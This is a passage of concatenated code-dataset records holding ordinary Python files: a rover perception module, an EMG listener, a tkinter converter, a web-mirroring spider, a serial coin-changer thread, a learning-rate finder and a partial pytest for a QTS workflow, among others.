Calculate distance to each pixel\n    dist = np.sqrt(x_pixel**2 + y_pixel**2)\n    # Calculate angle away from vertical for each pixel\n    angles = np.arctan2(y_pixel, x_pixel)\n    return dist, angles\n\n# Define a function to apply a rotation to pixel positions\ndef rotate_pix(xpix, ypix, yaw):\n    # TODO:\n    # Convert yaw to radians\n    # Apply a rotation\n    yaw_rad = yaw * np.pi / 180\n    xpix_rotated = xpix * np.cos(yaw_rad) - ypix * np.sin(yaw_rad)\n    ypix_rotated = xpix * np.sin(yaw_rad) + ypix * np.cos(yaw_rad)\n    # Return the result  \n    return xpix_rotated, ypix_rotated\n\n# Define a function to perform a translation\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n    # TODO:\n    # Apply a scaling and a translation\n    scale = 10\n    # Perform translation and convert to integer since pixel values can't be float\n    xpix_translated = np.int_(xpos + (xpix_rot / scale))\n    ypix_translated = np.int_(ypos + (ypix_rot / scale))\n    # Return the result  \n    return xpix_translated, ypix_translated\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n    # Apply rotation\n    xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n    # Apply translation\n    xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n    # Perform rotation, translation and clipping all at once\n    x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n    y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n    # Return the result\n    return x_pix_world, y_pix_world\n\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n           \n    M = cv2.getPerspectiveTransform(src, dst)\n    warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n    \n    return warped\n\ndef rock_thresh(img, boundary =([100,100,0], [200,200,70])):\n    \"\"\"apply thresholding to find the rock sample\"\"\"\n    lower = np.array(boundary[0], dtype = \"uint8\")\n    upper = np.array(boundary[1], dtype = \"uint8\")\n    # create mask\n    mask = cv2.inRange(img, lower, upper)\n    # apply image masking\n    output = cv2.bitwise_and(img, img, mask = mask)\n    # convert result to gray\n    output = cv2.cvtColor(output, cv2.COLOR_RGB2GRAY)\n    # create temp image for our rock\n    zeros = np.zeros_like(img[:,:,0])\n    try:\n        # get the closest coordinate of the transformed rock\n        closest_x = max(output.nonzero()[1])\n        closest_y = max(output.nonzero()[0])\n        # make the rock look bigger instead of just dot\n        zeros[closest_y:closest_y+5,closest_x:closest_x+5] = 1\n        return zeros\n    except:\n        #if no rock is in image, return zeros\n        return zeros\n# Apply the above functions in succession and update the Rover state accordingly\ndef perception_step(Rover):\n    # Perform perception steps to update Rover()\n    # TODO: \n    # NOTE: camera image is coming to you in Rover.img\n    # 1) Define source and destination points for perspective transform\n    dst_size = 5 \n    bottom_offset = 6\n    source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n    destination = np.float32([[Rover.img.shape[1]/2 - dst_size, Rover.img.shape[0] - bottom_offset],\n                  [Rover.img.shape[1]/2 + dst_size, Rover.img.shape[0] - bottom_offset],\n                  [Rover.img.shape[1]/2 + dst_size, Rover.img.shape[0] - 2*dst_size - bottom_offset], \n                  [Rover.img.shape[1]/2 - dst_size, Rover.img.shape[0] - 2*dst_size - bottom_offset],\n                  ])\n    # 2) Apply perspective transform\n    warped_terrain = perspect_transform(Rover.img, source, destination)\n\n    # 3) Apply color threshold to identify navigable terrain/obstacles/rock samples\n    thresholded_navigable = color_thresh(warped_terrain, rgb_thresh=(160, 160, 160))\n\n    # get index of the navigable terrain\n    not_obstacle_index = thresholded_navigable.nonzero()\n    # create obstacle image, which is the reverse of navigable terrain (thresholded)\n    obstacle = np.ones_like(Rover.img[:,:,0])\n    obstacle[not_obstacle_index] = 0\n\n    # detect rock if it exist\n    rock = rock_thresh(warped_terrain)\n\n    # 4) Update Rover.vision_image (this will be displayed on left side of screen)\n\n    # update Rover.vision_image[:,:,0] = obstacle color-thresholded binary image\n    Rover.vision_image[:,:,0] = obstacle\n\n    # update Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image\n    Rover.vision_image[:,:,1] = rock\n\n    # update Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image\n    Rover.vision_image[:,:,2] = thresholded_navigable\n\n    # 5) Convert map image pixel values to rover-centric coords\n    navigable_xpix, navigable_ypix = rover_coords(thresholded_navigable)\n    obstacle_xpix, obstacle_ypix = rover_coords(obstacle)\n    rock_xpix, rock_ypix = rover_coords(rock)\n\n    # 6) Convert rover-centric pixel values to world coordinates\n    world_size = 200\n    scale = 10\n    navigable_xpix_world, navigable_ypix_world = pix_to_world(navigable_xpix, navigable_ypix, Rover.pos[0], Rover.pos[1], \n                                                      Rover.yaw, world_size, scale)\n    obstacle_xpix_world, obstacle_ypix_world = pix_to_world(obstacle_xpix, obstacle_ypix, Rover.pos[0], Rover.pos[1], \n                                                      Rover.yaw, world_size, scale)\n    rock_xpix_world, rock_ypix_world = pix_to_world(rock_xpix, rock_ypix, Rover.pos[0], Rover.pos[1], \n                                                      Rover.yaw, world_size, scale)\n\n    # 7) Update Rover worldmap (to be displayed on right side of screen)\n    Rover.worldmap[obstacle_ypix_world, obstacle_xpix_world, 0] += 1\n    Rover.worldmap[rock_ypix_world, rock_xpix_world, 1] += 1\n    Rover.worldmap[navigable_ypix_world, navigable_xpix_world, 2] += 1\n\n\n    # 8) Convert rover-centric pixel positions to polar coordinates\n    # Update Rover pixel distances and angles\n        # Rover.nav_dists = rover_centric_pixel_distances\n        # Rover.nav_angles = rover_centric_angles\n    dist, angles = to_polar_coords(navigable_xpix, navigable_ypix)\n    Rover.nav_dists = dist\n    Rover.nav_angles = angles\n      \n    \n    return Rover","sub_path":"RoboND-Rover-Project/code/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":7759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"272737671","text":"from collections import deque\nfrom threading import Lock, Thread\nimport numpy as np\nimport time\nimport myo\n#from IIRFilter import LowPassIIR\n\n\n\nclass BufferPlus(myo.DeviceListener):\n    #An instance of this class constantly collects new EMG data in a queue (buffer)\n    def __init__(self, buffer_len):\n        self.n = buffer_len\n        self.lock = Lock()\n        self.mav_data_queue = deque(maxlen=self.n)\n        # self.y = 0\n        # self.a = 24/25*np.ones([8,1])\n        self.y = np.zeros(8)\n        self.a = 24/25\n        self.mav_data_queue = deque(maxlen=self.n)\n\n    def filter(self,x):\n        # self.y = (1-self.a[self.i]) * x + self.a[self.i] * self.y\n        self.y = (1 - self.a) * x + self.a * self.y\n        return self.y\n\n    # def get_mav_data(self,in_data):\n        # mav_data = []\n        # #num_splitarray = np.linspace(0,496,64,dtype=int) #(step = 7, num = 64)\n\n        # with self.lock:\n            # # compute the MAV data\n            # #for j in num_splitarray:\n            # for self.i in range(0,8):\n\n                # col_data = in_data[:,self.i]\n                # abs_data = np.absolute(col_data)\n                \n                # # filter\n                # for n in range(0, len(abs_data)):\n                    # abs_data[n] = self.filter(abs_data[n])\n                # mav_data.append(list(abs_data))\n\n        # return mav_data\n        \n    def get_mav_data(self, in_data):  # 512*8\n        mav_data = np.zeros((0,8))  # 8 columns\n        for sample in in_data:\n            aaa = self.filter(np.array(abs(sample)))\n            mav_data = np.row_stack((mav_data, aaa))\n        return mav_data\n\n","sub_path":"myo_ecn/listenersPlus.py","file_name":"listenersPlus.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"624573467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\noracle_url = 'http://127.0.0.1:20632'\nheaders = {'Content-type': 'application/json'}\nmethod_recharge = \"sendrechargetransaction\"\nmethod_blk_log = \"getwithdrawtransactionsbyheight\"\nmethod_exist_txs = \"getexistdeposittransactions\"\nmethod_blk_num = \"getblockcount\"\nmethod_tx_info = \"getwithdrawtransaction\"\n\nkey_crosschainassets = \"crosschainassets\"\nkey_crosschainaddress = \"crosschainaddress\"\nkey_crosschainamount = \"crosschainamount\"\nkey_outputamount = \"outputamount\"\nkey_txid = 'txid'","sub_path":"tests/sidechain_eth/case/orcal_config.py","file_name":"orcal_config.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"469567261","text":"#exercise 06-03\n'''\nstudent name:dante\nclass:net182\nstudent id:201810701580051\n'''\nfrom tkinter import *\nroot = Tk()\n\nuser_text = Entry(root)\nuser_text.pack()\n\nlabel1 = Label(root,text = '')\nlabel1.pack()\n\ndef calcC():\n    num = float(Entry.get(user_text))\n    new_temp = (num - 32)/1.8\n    label1.config(text=str(new_temp))\ndef calcF():\n    num = float(Entry.get(user_text))\n    new_temp = num*1.8+32\n    label1.config(text=str(new_temp))\n\n\nbutton1 = Button(root,text = 'celsius',fg='red',command = calcC)\nbutton2 = Button(root,text = 'Fahrenheit',fg='green',command = calcF)\nbutton1.pack(side = LEFT)\nbutton2.pack(side = LEFT)\nroot.mainloop()\n","sub_path":"Python_OOP/Exercise/Exercise 06/201810701580051 - Dante/06-03.py","file_name":"06-03.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"622135468","text":"# Takes a list of integers and finds two numbers that add up to a target value.\n\noutput = list()\nnums = list()\nnumLength = int(input(\"How many numbers are in the number list: \"))\ntarget = int(input(\"What is the Target Integer: \"))\nn = 0\ni = 0\np = 0\n\nwhile n < numLength :\n    nums.append(int(input(\"Enter a number in the number list: \")))\n    n += 1\nprint(\"----------------------------\")\n\nwhile i < numLength :\n    while p < numLength :\n        if nums[i] + nums[p] == target :\n            output.append(i)\n            output.append(p)\n            print(\"The indices are: \" + str(output[0]) + \" and \" + str(output[1]))\n        p += 1\n    i += 1","sub_path":"Math/Two-Sum/Two-Sum.py","file_name":"Two-Sum.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"568936847","text":"from typing import List\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def binary_tree_paths(self, root: TreeNode) -> List[str]:\n        paths = []\n\n        def deep(root, path):\n            if not root:\n                return\n            path = path + [str(root.val)]\n            if not root.left and not root.right:\n                return paths.append(\"->\".join(path))\n            deep(root.left, path)\n            deep(root.right, path)\n\n        deep(root, [])\n        return paths\n","sub_path":"0257.binary_tree_paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"138446224","text":"import math\r\nimport torch\r\nimport sys\r\nimport torch.nn as nn\r\nfrom model import AutoEncoder\r\nimport matplotlib.pyplot as plt\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.optim import Adam, lr_scheduler, SGD\r\nfrom torchvision import datasets, transforms\r\n\r\ndef load_data(data_dir, batch_size):\r\n    \"\"\" Method returning a data loader for labeled data \"\"\"\r\n    transform = transforms.Compose([\r\n        transforms.ToTensor(),\r\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n        ]\r\n    )\r\n    data = datasets.ImageFolder(f'{data_dir}/unsupervised', transform=transform)\r\n    data_loader = DataLoader(\r\n        data,\r\n        batch_size=batch_size,\r\n        shuffle=True,\r\n        num_workers=0\r\n    )\r\n    return data_loader\r\n\r\n\r\ndef find_lr( model, data_loader, device, init_value = 1e-8, final_value=10, beta = 0.98):\r\n    num = len(data_loader)-1\r\n    mult = (final_value / init_value) ** (1/num)\r\n    lr = init_value\r\n    optimizer.param_groups[0]['lr'] = lr\r\n    avg_loss = 0.\r\n    best_loss = 0.\r\n    batch_num = 0\r\n    losses = []\r\n    log_lrs = []\r\n\r\n    model.train()\r\n    for i, (images, _) in enumerate(data_loader):\r\n        batch_num += 1\r\n\r\n        images = Variable(images.to(device))\r\n\r\n        outputs = model(images)\r\n        loss = loss_fn(outputs, images)\r\n\r\n        train_loss = loss.cpu().data * images.size(0)\r\n\r\n        avg_loss = beta * avg_loss + (1-beta) * train_loss\r\n        smoothed_loss = avg_loss / (1 - beta**batch_num)\r\n\r\n        if batch_num > 1 and smoothed_loss > 4 * best_loss:\r\n            return log_lrs, losses\r\n        if smoothed_loss < best_loss or batch_num==1:\r\n            best_loss = smoothed_loss\r\n\r\n        losses.append(smoothed_loss)\r\n        log_lrs.append(math.log10(lr))\r\n\r\n        optimizer.zero_grad()\r\n        loss.backward()\r\n        optimizer.step()\r\n\r\n        lr *= mult\r\n        optimizer.param_groups[0]['lr'] = lr\r\n        sys.stdout.write('\\r[ %d/%d] LR: %f' % (i, len(data_loader), lr))\r\n\r\n    return log_lrs, losses\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nmodel = AutoEncoder().to(device)\r\noptimizer = Adam(model.parameters(), lr=0.01, weight_decay=0.0001)\r\n# optimizer = AdamW(model.parameters(), lr=0.01, weight_decay=0.0001)\r\n# optimizer = SGD(model.parameters(), lr=0.05)\r\n# loss_fn = nn.CrossEntropyLoss()\r\nloss_fn = nn.MSELoss()\r\ndata_loader_train = load_data('./data', 128)\r\nlogs,losses = find_lr(model = model, data_loader = data_loader_train, device = device)\r\nplt.plot(logs[10:-5],losses[10:-5])\r\nplt.show()\r\n","sub_path":"Semi Supervised/find_lr.py","file_name":"find_lr.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"410178041","text":"import scrapy\nimport os\nimport datetime\n\nclass WebSpider(scrapy.Spider):\n    name = 'web'\n\n    def __init__(self, base_url='', default_path=\"resources\", folder_name='', year=''):\n        assert base_url != '' and folder_name != ''\n\n        self.default_path = default_path\n        self.start_urls = [base_url]\n        if '.' in base_url:\n            base_url = '/'.join(base_url.split('/')[:-1])\n        self.allowed_prefix = base_url.rstrip('/') + '/'\n        year = year if year else datetime.datetime.now().year\n        self.folder_name = \"%s-%s\" %(folder_name, year)\n        self.allowed_domains = []\n\n        assert not os.path.exists(\"%s/%s\" %(self.default_path, self.folder_name))\n\n        for url in self.start_urls:\n            self.allowed_domains.append(url.split('/')[2])\n        scrapy.Spider.__init__(self)\n\n    def parse(self, response):\n        yield {'url': response.url}\n\n        full_path = \"%s/%s/%s\" % (self.default_path, self.folder_name, response.url[len(self.allowed_prefix):])\n        directory = full_path[:full_path.rfind('/')]\n        file_name = full_path[full_path.rfind('/') + 1:]\n        if not file_name:\n            full_path = full_path + \"index.html\"\n        try:\n            os.makedirs(directory)\n        except:\n            pass\n\n        with open(full_path, 'wb') as f:\n            f.write(response.body)\n\n        if response.headers['Content-Type'] == 'text/html':\n            content = open(full_path).read()\n            f = open(full_path, 'w')\n            f.write(content.replace(self.allowed_prefix, '').replace('/' + '/'.join(self.allowed_prefix.split('/')[3:]), ''))\n            next_pages = response.css('*::attr(href)').extract()\n            for page in next_pages:\n                if page is not None:\n                    new_link = response.urljoin(page)\n                    if new_link.startswith(self.allowed_prefix):\n                        yield scrapy.Request(new_link, callback=self.parse)","sub_path":"web/spiders/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"167038761","text":"#!/usr/bin/env python3\n\nf = open(\"newFile.txt\", \"w\")\n\n# need rge end of line to go to next line\nf.write(\"blah\")\nf.write(\" blah again \\n\")\nf.write(\"A new line \\n\")\n\n# example of formatted writing (j, x, t) is a tuple\nj = 36\nx = 34.12\nt = \"blah\"\nf.write(\"An integer %d then a float %f then a string %s \\n\" % (j, x, t))\n\n# I could stich my variables into a string instead.\n# Then I can do anything I want with the string...\n# including writing it to the file\nu =  \"A float %f\" % x\nf.write(u + \"\\n\")\n\n# Here is how I could control the floating format\nu =  \"A float with 8 decimal digits %.8f\" % x   # 8 decimal digits\nf.write(u + \"\\n\")\n\n# Fixed width of 9 with 3 decimal digits\nx = 34.12\ny = 1289.98\nu =  \"A float width 9 %9.3f\" % x   \nv =  \"A float width 9 %9.3f\" % y   \nf.write(u + \"\\n\" + v + \"\\n\")\n\n# And now exponential\nf.write(\"Exponential = %e\" % y)\n\n# And there are many more ways of controling the output\n# Note: this is the \"old-style\" formatting.\n# The \"new style\" uses the string.format(...) syntax\n\n\nf.close()\n","sub_path":"campagnari/python/demoWriteFile.py","file_name":"demoWriteFile.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"651805390","text":"# update list of clauses\ndef update_clauses(clauses, truthvalues):\n    changed = False\n    for clause in [*clauses]:\n        clause_not_removed = True\n        for literal in [*truthvalues]:\n\n            if (literal in clause) & clause_not_removed:\n                # verwijder de clause waarin een waarde staat die al waar is.\n                if truthvalues[literal]:\n                    changed = True\n                    clauses.remove(clause)\n                    clause_not_removed = False\n                if -literal in clause:\n                    changed = True\n                    clause.remove(-literal)\n\n                # verwijder een literal uit een clause waarvan je weet dat die niet waar is.\n                if not truthvalues[literal]:\n                    changed = True\n                    clause.remove(literal)\n\n                if -literal in clause:\n                    changed = True\n                    clauses.remove(clause)\n                    clause_not_removed = False\n    return changed\n\n\ndef update_literals(literal, negative_literals, positive_literals, all_literals):\n\n    if literal in all_literals:\n        all_literals.remove(literal)\n    if -literal in all_literals:\n        all_literals.remove(-literal)\n    if literal in negative_literals:\n        negative_literals.remove(literal)\n    if -literal in negative_literals:\n        negative_literals.remove(-literal)\n    if literal in positive_literals:\n        positive_literals.remove(literal)\n    if -literal in positive_literals:\n        positive_literals.remove(-literal)\n\n","sub_path":"updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"7194148","text":"import os, PIL, glob\nimport tkinter as tk\nimport tkinter.font as tkFont\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass UiNotification(tk.Canvas):\n    def __init__(self, texts, master=None):\n        tk.Canvas.__init__(\n            self, master, \n            width=220, height=120,\n            borderwidth=0,\n            highlightthickness=0,\n        )\n    \n        self.master = master\n        self.texts = texts\n\n        self.is_notification_animating = False\n\n    def create_print_notification(self):\n        self.place(relx=0.5, rely=0, anchor=\"n\", y=-60)\n        \n        params = {\n            'notif_bg': \"#ddf1d1\",\n            'notif_border_bg': \"#64b747\",\n            'tag': 'print_notification',\n            'icon_type': \"printer\",\n            'texts_key': \"printing\"\n        }\n\n        self.notification_creator(params)\n\n        self.animate_notification_in(\"print_notification\")\n\n    def create_error_notification(self, texts_key = \"\"):\n        self.place(relx=0.5, rely=0, anchor=\"n\", y=-60)\n        \n        params = {\n            'notif_bg': \"#f1d1d9\",\n            'notif_border_bg': \"#b74747\",\n            'tag': 'error_notification',\n            'icon_type': \"error\",\n            'texts_key': texts_key\n        }\n\n        self.notification_creator(params)\n\n        if self.is_notification_animating == False:\n            self.animate_notification_in(\"error_notification\")\n\n    def notification_creator(self, params):\n        notification_container = tk.Frame(\n            self, \n            text = None,\n            padx = 5,\n            pady = 5,\n            bg = params['notif_bg'],\n            borderwidth=2,\n            relief=\"flat\",\n            highlightbackground=params['notif_border_bg'],\n            highlightthickness=2,\n            width=self['width'],\n            height=60\n        )\n        notification_container.pack_propagate(0)\n\n        self.create_window(0, 0, \n            window=notification_container, \n            anchor=\"nw\", \n            tag=params['tag'],\n        )\n\n        countdown_label_style = tkFont.Font(\n            family='DejaVu Sans Mono', \n            size=12\n        )\n\n        btn_icon_src = PIL.Image.open(\n            f\"{ROOT_DIR}/../assets/{params['icon_type']}-icon.png\"\n        ).convert(\"RGBA\")\n        btn_icon_src = btn_icon_src.resize((30, 30), PIL.Image.ANTIALIAS)\n        btn_bgc_tmp = PIL.Image.composite(\n            btn_icon_src,\n            PIL.Image.new(\n                'RGB', \n                btn_icon_src.size,\n                notification_container[\"bg\"]\n            ),\n            btn_icon_src\n        )\n        btn_icon = PIL.ImageTk.PhotoImage(btn_bgc_tmp)\n\n        label = tk.Label(\n            notification_container, \n            image=btn_icon, \n            bg=notification_container[\"bg\"]\n        )\n        label.image = btn_icon\n        label.pack(side=\"left\", padx=(15, 15))\n        \n        label = tk.Label(\n            notification_container, \n            text=self.texts[params[\"texts_key\"]],\n            font = countdown_label_style,\n            bg=notification_container[\"bg\"],\n            justify=\"left\"\n         )\n        label.pack(side=\"left\")\n\n    def animate_notification_in(self, tag_name):\n        x_pos, y_pos = self.coords(tag_name)\n\n        if(y_pos < 60):\n            self.move(tag_name, 0, 1)\n            self.master.after(1, lambda: self.animate_notification_in(tag_name))\n        else:\n            self.is_notification_animating = True\n            self.master.after(1500, lambda: self.animate_notification_out(tag_name))\n\n    def animate_notification_out(self, tag_name):\n        x_pos, y_pos = self.coords(tag_name)\n\n        if(y_pos > 0):\n            self.move(tag_name, 0, -1)\n            self.master.after(1, lambda: self.animate_notification_out(tag_name) )\n        else:\n            self.is_notification_animating = False\n            self.place_forget()\n","sub_path":"software/classes/UiNotification.py","file_name":"UiNotification.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"496632616","text":"__author__ = 'Miguel'\r\n\r\n\"\"\" Imports \"\"\"\r\nimport threading\r\nfrom time import sleep\r\n\r\nimport serial\r\n\r\nfrom VMC.Utils import Commands\r\n\r\n\r\nclass ChangerThread(threading.Thread):\r\n    \"\"\"\r\n     Class ChangerThread.\r\n      Thread for COM connection and data handling with the changer.\r\n\r\n      TODO: Define if the platform is Windows or Unix.\r\n    \"\"\"\r\n\r\n    \"\"\" Global Variables \"\"\"\r\n    # COM variables\r\n    com_port_number = 0\r\n    com_port = None\r\n\r\n    # Commands and VMCCommands object\r\n    commands = Commands.VmcCommands()\r\n\r\n    # Flags\r\n    is_writing = False\r\n    is_polling = False\r\n    must_dispense = False\r\n    must_reset = False\r\n\r\n    # Thread Communication\r\n    socket_receive = []\r\n    socket_response = \"\"\r\n\r\n    def open_com(self):\r\n        \"\"\" Creates and opens the serial port. \"\"\"\r\n        \"\"\"\r\n        coms = []\r\n\r\n        print('Searching COMs...')\r\n        for i in range(0, 255):\r\n            try:\r\n                av_port = serial.Serial(i)\r\n                coms.append(\"COM\" + str(i + 1))\r\n                av_port.close()\r\n            except serial.SerialException:\r\n                pass\r\n\r\n        print(coms)\r\n\r\n        self.com_port_number = int(raw_input('Select COM port: ')) - 1\r\n        \"\"\"\r\n\r\n        self.com_port = serial.Serial('/dev/tty.usbserial', 115200, timeout=1, parity=serial.PARITY_NONE, rtscts=1)\r\n\r\n        if self.com_port.isOpen():\r\n            self.com_port.close()\r\n        self.com_port.open()\r\n\r\n        print('{} is open.'.format(self.com_port.name))\r\n\r\n    def write_cmd(self, cmd=Commands.VmcCommands(), in_waiting=0, sleep_thread=0.25):\r\n        \"\"\"\r\n         Method for sending a command via serial port.\r\n          Defaults: waits for 0 byte on the serial buffer, sleeps the thread for 100ms.\r\n        \"\"\"\r\n\r\n        # Try to open the serial port. First check if it's open already.\r\n        try:\r\n            if self.com_port.isOpen():\r\n\r\n                # Write the command (see Commands.py) to the serial port, and print it.\r\n                self.com_port.write(cmd['cmd'])\r\n                print('{} cmd sent'.format(cmd['name']))\r\n\r\n                # Sleep the thread until we have the minimum required data or until we have a timeout (default=500ms).\r\n                \"\"\"\r\n                timeout = 0\r\n                while self.com_port.inWaiting() < in_waiting and timeout < 10:\r\n                    timeout += 1\r\n                    sleep(.5)\r\n                if timeout >= 10:\r\n                    raise serial.SerialException\r\n                \"\"\"\r\n\r\n                # Read the required bytes from the serial port.\r\n                data = ''\r\n\r\n                if in_waiting > 0:\r\n                    while not data[-2:] == 'X9':\r\n                        data += self.com_port.read()\r\n                    # Evaluate the data received.\r\n                    # If the last two bytes are 'X9' then we have a correct package.\r\n                    if data[-2:] == 'X9':\r\n                        print('Correct byte received: {}'.format(data))\r\n                    else:\r\n                        print('Wrong byte: {}'.format(data))\r\n\r\n                    sleep(sleep_thread)\r\n                else:\r\n                    print(self.com_port.readline())\r\n\r\n                self.com_port.flushInput()\r\n                self.com_port.flushOutput()\r\n\r\n        except serial.SerialException:\r\n            # If a SerialException is catch then must restart the communication.\r\n            self.must_reset = True\r\n            sleep(sleep_thread)\r\n\r\n    def write_poll(self):\r\n        \"\"\" Writes a Poll command. \"\"\"\r\n        self.write_cmd(self.commands.POLL, 6)\r\n\r\n    def write_reset(self):\r\n        \"\"\" Writes a Reset command. \"\"\"\r\n        self.write_cmd(self.commands.RESET, 4, 1)\r\n        sleep(.5)\r\n\r\n    def write_setup(self):\r\n        \"\"\" Writes a Setup command. \"\"\"\r\n        self.write_cmd(self.commands.SETUP, 1)\r\n        self.write_cmd(self.commands.ACK)\r\n\r\n    def write_tube_status(self):\r\n        \"\"\" Writes a Status command. \"\"\"\r\n        self.write_cmd(self.commands.TUBE_STATUS, 1)\r\n        self.write_cmd(self.commands.ACK)\r\n\r\n    def write_coin_type(self):\r\n        \"\"\" Writes a Coin Type command. \"\"\"\r\n        self.write_cmd(self.commands.COIN_TYPE, 1)\r\n\r\n    def write_dispense(self, units=0, cents=0):\r\n        \"\"\" Writes a Dispense command. Also evaluates which coins should be dispensed. \"\"\"\r\n        # Evaluate coins.\r\n        res = units\r\n        quantity_10 = res / 10\r\n        res %= 10\r\n        quantity_5 = res / 5\r\n        res %= 5\r\n        quantity_2 = res / 2\r\n        res %= 2\r\n        quantity_1 = res / 1\r\n\r\n        quantity_50c = cents / 5\r\n\r\n        # Dispense coins depending on the coins it should dispense.\r\n        if not quantity_10 == 0:\r\n            self.write_cmd(self.commands.dispense_10(quantity_10), 2)\r\n        if not quantity_5 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_5, 4), 0)\r\n        if not quantity_2 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_2, 3), 0)\r\n        if not quantity_1 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_1, 2), 0)\r\n        if not quantity_50c == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_50c, 0), 0)\r\n\r\n    def init_sequence(self):\r\n        \"\"\" Initialization sequence. \"\"\"\r\n        print('Reset sequence activated')\r\n        self.write_reset()\r\n        self.write_poll()\r\n        self.write_setup()\r\n        self.write_tube_status()\r\n        self.write_coin_type()\r\n\r\n    def run(self):\r\n        \"\"\" Run method for the thread. \"\"\"\r\n\r\n        # First run.\r\n        # Must not reset and start the initialization sequence.\r\n        while 1:\r\n            self.must_reset = False\r\n            self.init_sequence()\r\n            while not self.must_reset:\r\n                # If we must not dispense a coin then poll the device.\r\n                # Else, dispense the required coins.\r\n                if not self.must_dispense:\r\n                    self.is_polling = True\r\n                    self.write_poll()\r\n                    self.is_polling = False\r\n                elif self.must_dispense:\r\n                    self.is_polling = True\r\n                    self.write_dispense(self.socket_receive[0], self.socket_receive[1])\r\n                    self.is_polling = False\r\n                    self.must_dispense = False\r\n                    self.socket_response = 'Dispensed: {}.{}'.format(self.socket_receive[0], self.socket_receive[1])\r\n\r\n    def __init__(self):\r\n        \"\"\" Initialization of the thread. \"\"\"\r\n        super(ChangerThread, self).__init__()\r\n        self.open_com()","sub_path":"VMC/Coin_Changer/ChangerThread.py","file_name":"ChangerThread.py","file_ext":"py","file_size_in_byte":6599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"486162572","text":"#!/usr/bin/env python2\n# coding=utf-8\nimport os\nimport time\nimport pytest\nimport psutil\nimport requests\nimport logging\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO)\nlogging.disable(logging.DEBUG)\nlog = logging.getLogger(__file__)\n\n\nQTS_PROCESS = 'qts'\nWFE_URL = 'http://localhost:12345/processes'\nMM_URL = 'http://localhost:12345/entities/program/{}'\n\n\ndef wait(timeout=10, interval=1):\n    \"\"\"\n    Useful wait decorator.\n    Usage with function declaration: @wait(60, 1)\n    Usage in test code: wait(60)(func_to_wait)(func_params)\n    Return: last or successful func_to_wait(func_params) result\n    \"\"\"\n    def what(func):\n        def whit_args(*args):\n            end_time = time.time() + timeout\n            result = func(*args)\n            while not result and time.time() < end_time:\n                time.sleep(interval)\n                result = func(*args)\n            return result\n        return whit_args\n    return what\n\n\n@wait(180)\ndef check_wfe_status(process, expected_status):\n    \"\"\"Return True if process has expected status in Workflow Engine API\"\"\"\n    status = [proc['status'] for proc in requests.get(WFE_URL).json() if proc['name'] == process]\n    # Assume that process name is unique\n    return status and status[0] == expected_status\n\n\n@pytest.fixture(autouse=True)\ndef run_qts_mock():\n    # Imports are here, because this function is needed only to simulate work of QTS.\n    # If set autouse=False and delete mock, then these imports won't affect test case.\n    from qts_mock import ApiMock, consume_xml\n    from BaseHTTPServer import HTTPServer\n    from threading import Thread\n    qts = Thread(target=consume_xml)\n    qts.daemon = True\n    qts.start()\n    serv = HTTPServer((\"localhost\", 12345), ApiMock)\n    wfe = Thread(target=serv.serve_forever)\n    wfe.start()\n    yield\n    serv.shutdown()\n\n\ndef test_qts():\n    log.info(\"TestCase: Positive QTS system test\")\n    dir_name, xml_name, program = 'qts_watch_folder', 'test.xml', 'program_name'\n\n    log.info(\"Step: Put xml file {} into directory {}\".format(xml_name, dir_name))\n    